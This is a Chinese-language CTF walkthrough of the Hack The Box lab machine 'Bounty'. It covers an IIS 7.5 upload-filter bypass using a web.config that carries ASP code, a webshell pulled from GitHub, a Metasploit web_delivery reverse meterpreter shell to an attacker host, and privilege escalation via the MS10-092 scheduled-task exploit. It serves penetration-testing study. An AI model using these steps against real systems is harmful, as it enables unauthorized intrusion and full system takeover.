CTF靶機——bounty通關攻略

今天，我們的CTF靶機是bounty。這個靶機來自hack the box漏洞實驗室。他們有很多的ctf靶機，滲透測試人員可以進行在線測試，從初級水平到專業級別的靶機都有。

我們這個靶機的等級屬於中級。靶機的任務是找到user.txt和root.txt文件。

注意：因為這些實驗都可以進行在線測試，所以他們都有一個靜態IP，Bounty靶機的IP是10.10.10.93。

通關攻略

首先，肯定是掃描神器Nmap開路，用基本的nmap命令來探測開放的埠和服務：

nmap -A 10.10.10.93

從掃描結果可以看到開啟了80埠，運行的服務是IIS7.5.

我們來訪問一下80埠，在瀏覽器地址欄中輸入IP地址後，我們可以看到下面這個頁面：

頁面只有一個圖片，並沒有什麼有價值的信息，接著我們使用Dirbuster工具來進行目錄遍歷，如圖

這裡我們使用的字典是directory-list-2.3-medium.txt來進行web目錄遍歷。

不出所料，很快就有了響應，可以看到存在transfer.aspx文件和uploadedFiles目錄，如圖：

OK，我們在瀏覽器中訪問一下transfer.aspx這個文件，於是我們得到了一個新的頁面，這個頁面可以進行文件上傳，如圖：

我們嘗試了很多次進行上傳文件，但是每次都上傳失敗，並且提示：invalid file please try again(上傳文件無效，請重新嘗試)，如圖所示：

嘗試了多次並且失敗後，我便去Google查找了一番，搜索「IIS 7.5 rce upload」，發現了一篇文章，在這篇文章中，我們了解到了web.config文件，它在IIS7.0(或更高版本中)存儲著非常重要的配置信息，跟Apache伺服器的.htaccess文件非常類似。上傳.htaccess文件來繞過文件上傳的防禦是一種常用的套路。

讀了上面的文章後，我們寫了一段簡單的asp代碼並將代碼插入web.config文件的後面，這段代碼的意思是返回1+2的值，如圖：

現在我們再來上傳這個web.config文件，可以看到web.config文件已經成功上傳，剛才目錄遍歷出來一個uploadedFiles目錄，我們可以猜想上傳的文件就在這個目錄下，我們可以驗證一下，如圖：

訪問該目錄下的web.config文件，得以執行，返回結果3，如圖：

既然可以執行，那麼我們就可以在這個文件中注入惡意代碼來實現RCE漏洞。

在網上找了一番，找到了ASP的webshell，網址是https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp

把這個ASP webshell的整個內容複製到web.config文件中，然後上傳，如圖：

上傳的web.config文件執行之後，就會創建一個表單，在這個表單中輸入命令就可以實現遠程命令執行了，如圖所示：

不過，這裡我們將執行metasploit的web delivery模塊生成的powershell代碼，利用過程如下：

msf use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) set srvhost 10.10.14.2

msf exploit(multi/script/web_delivery) set target 2

msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) set lhost 10.10.14.2

msf exploit(multi/script/web_delivery) run

執行之後我們就可以得到一個meterpreter會話了，如圖所示：

非常棒，既然獲得了受害主機的meterpreter會話，那我們就可以查看user.txt來完成第一個任務了。

最終，我們在/users/merlin/Desktop目錄中找到了user.txt文件，如圖：

下一步就是要找到root.txt文件了，不過要查看這個文件，通常需要進行提權。

這裡我們可以利用後滲透利用模塊「Multi Recon Local Exploit Suggester」，這個模塊會告訴我們可以進一步滲透攻擊的meterpreter exp。這些exp是基於目標主機的架構和使用平台推薦的本地可用的exp。執行下列命令：

use post/multi/recon/local_exploit_suggester

msf post(multi/recon/local_exploit_suggester) > set session 1

msf post(multi/recon/local_exploit_suggester) > exploit

結果如圖：

非常不錯，這個腳本非常有用，顯示了目標主機存在的漏洞和相對應的exp。接下來，我們就來試一下圖中框起來的第一個exp。

這個漏洞是關於計劃任務的，導致可以進行提權。這個利用模塊已經在存在漏洞的Windows Vista Windows7和Windows server 2008 x64和x86上測試過了有效。利用起來也比較簡單，只要進行如下設置即可：

use exploit/windows/local/ms10_092_schelevator

msf post(windows/local/ms10_092_schelevator) > set lhost 10.10.14.2

msf post(windows/local/ms10_092_schelevator) > set lport 5555

msf post(windows/local/ms10_092_schelevator) > set session 1

msf post(windows/local/ms10_092_schelevator) > exploit

如圖：

執行之後就獲得了另一個meterpreter會話，現在我們來看看提權的情況，執行下面兩條命令：

getsystem

getuid

結果如圖：

可以看到現在的系統用戶是NTAUTHORITYSYSTEM，已經是最高許可權了，提權成功。

接下來就好說了，查看root.txt文件的內容，這個就沒什麼好說的了，自己找一下就OK，本次靶機root.txt文件就在Desktop上，如圖：

好了，本次靶機到此結束，希望大家有所收穫！

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！